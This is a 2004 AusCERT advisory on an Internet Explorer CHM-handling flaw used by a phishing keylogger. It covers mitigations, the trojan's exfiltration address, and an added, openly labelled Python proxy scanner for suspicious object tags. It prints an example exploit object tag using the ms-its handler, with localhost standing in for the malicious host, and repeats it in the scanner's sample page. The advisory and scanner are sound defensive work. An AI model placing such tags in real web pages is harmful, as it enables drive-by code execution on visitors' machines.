AU-2004.007 -- AusCERT Update - Vulnerability in Internet Explorer Allows Program Execution

Date: 05 April 2004
References: ESB-2004.0261  ESB-2004.0268  ESB-2004.0278  

Please note, the AusCERT Update contained on this page has been
superseded by ESB-2004.0268 (see above for link) which contains
information relating to the patches now available from Microsoft.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

AusCERT Update AU-2004.007 - Vulnerability in Internet Explorer Allows
Program Execution
05 April 2004

A vulnerability in the handling of "Windows Help" files by Internet
Explorer allows the remote execution of arbitrary code on a local computer
by a malicious web site.  This vulnerability is currently being exploited
against Australian users using the bogus bank email reported in AusCERT
Alert AL-2004.10:

    http://www.auscert.org.au/3981

Following the link supplied in the message will initiate the execution of
the malicious key logger program on the user's computer.  A more detailed
breakdown of the actions taken by this combination of fraudulent email and
malicious trojan is at:

    http://www.codephish.info/modules.php?op=modload&name=News&file=article&sid=96

Details of the showHelp() vulnerability are available in Secunia advisory:

    http://secunia.com/advisories/10523/

At this time, AusCERT is not aware of a Microsoft patch for this
vulnerability.


Mitigation 

AusCERT recommends that users of Internet Explorer avoid visiting web sites
of untrusted origin, or avoid completely the use of Internet Explorer,
until a patch is available from Microsoft.  In any case, following links
in unsolicited email messages should be actively discouraged.

The current version of the key logging program sends the captured
information via e-mail to australia_tr@mail.ru. Blocking outbound email
to this address may be effective for this instance, but future versions
of the trojan are likely to use a different email address.

Removing the file type association for CHM files should prevent the
exploit, however this will effectively disable Windows Help.

System administrators with the ability to filter web traffic through a
proxy may be able to block access to pages referencing the affected object
tags which enable the exploit.

Example of a malicious "object" tag (with "localhost" substituted for the
malicious site URL):

<object data="ms-its: mhtml:file://C:\test.mhtml!http://localhost//bad.chm::/bad.html">

    (the local file, C:\test.mhtml, does not exist)

The object tags used to exploit the vulnerability include:

    ms-its
    mk
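
As an added example (not part of the AusCERT advisory and not AusCERT's own tooling), the following Python script shows the kind of check a filtering proxy could run over fetched HTML to flag object tags whose data attribute uses the ms-its or mk protocol handlers listed above, or that reference a sub-file inside a .chm archive. The set of attributes checked (data, codebase), the sample HTML, and the mk:@MSITStore form used in it are assumptions constructed for this example.

```python
"""Flag HTML object tags that reference the ms-its or mk protocol handlers.

Example detection logic written for this page; it is not AusCERT code.
"""
import re
from html.parser import HTMLParser

# Protocol handlers the advisory names as used by the exploit.
SUSPECT_SCHEMES = ("ms-its", "mk")

# Scheme prefix at the start of an attribute value, e.g. "ms-its:" or
# "MK:@MSITStore:", ignoring leading whitespace and case.
_SCHEME_RE = re.compile(
    r"^\s*(%s)\s*:" % "|".join(re.escape(s) for s in SUSPECT_SCHEMES),
    re.IGNORECASE,
)

# Reference into a compiled help file, e.g. "bad.chm::/bad.html".
_CHM_SUBFILE_RE = re.compile(r"\.chm::", re.IGNORECASE)


def suspect_scheme(value):
    """Return the lower-cased suspect scheme used by VALUE, or None."""
    m = _SCHEME_RE.match(value)
    return m.group(1).lower() if m else None


class ObjectTagScanner(HTMLParser):
    """Collects object tags whose data/codebase attribute looks like the exploit."""

    # Assumption: these are the attributes worth inspecting on <object>.
    CHECKED_ATTRS = ("data", "codebase")

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":          # HTMLParser already lower-cases tag names
            return
        for name, value in attrs:
            if value is None or name not in self.CHECKED_ATTRS:
                continue
            scheme = suspect_scheme(value)
            chm = bool(_CHM_SUBFILE_RE.search(value))
            if scheme or chm:
                self.findings.append({
                    "attr": name,
                    "value": value,
                    "scheme": scheme,       # "ms-its", "mk" or None
                    "chm_subfile": chm,     # True if a .chm::/... reference
                })


def scan_html(html):
    """Return a list of findings for HTML; an empty list means nothing flagged."""
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one benign object tag, the advisory's example tag
# (localhost standing in for the malicious host), and an upper-cased mk: variant.
SAMPLE_PAGE = r"""<html><body>
<object data="movie.swf" type="application/x-shockwave-flash"></object>
<object data="ms-its: mhtml:file://C:\test.mhtml!http://localhost//bad.chm::/bad.html"></object>
<OBJECT DATA="MK:@MSITStore:C:\help.chm::/index.htm"></OBJECT>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print("FLAGGED %s=%r (scheme=%s, chm_subfile=%s)" % (
            finding["attr"], finding["value"],
            finding["scheme"], finding["chm_subfile"]))
```

A proxy applying this check would drop or quarantine the response rather than just log it; the scheme match is done on the start of the attribute value so that ordinary http:// references to .chm downloads are not confused with the in-page object handler the advisory describes.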

AusCERT is aware of independent reports that disabling these protocol
handlers in the Windows registry may also prevent infection, but may also
have undesirable side-effects, including system restarting. AusCERT advise
that any actions of this nature should be taken only at the discretion of
your site, and only after isolated testing.

Anti-virus software and personal firewalls may be helpful in preventing
initial execution of the trojan (if file execution protection is available
and enabled), and in alerting the user of outbound connections by the email
component of the key logger.

Regards,

The AusCERT Team

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBQHDvMSh9+71yA2DNAQJ8ZAP/QX6aVAiwQUkUZ7tDp9fw7RljjLMg+ko4
3N9Zv/H7c5BoLX7ae8YLKOrFJpT2b1Zzssv4g8pLB02j2l1oeOLXmTknqkwFfU3H
BGcnUHPHhp93l9jPYMQ5mmz+h5AuWo41aUgpPwlh7LjgHRMWSB86vE1Ah1JItDfX
uQdw4NoZ1Jw=
=BFAV
-----END PGP SIGNATURE-----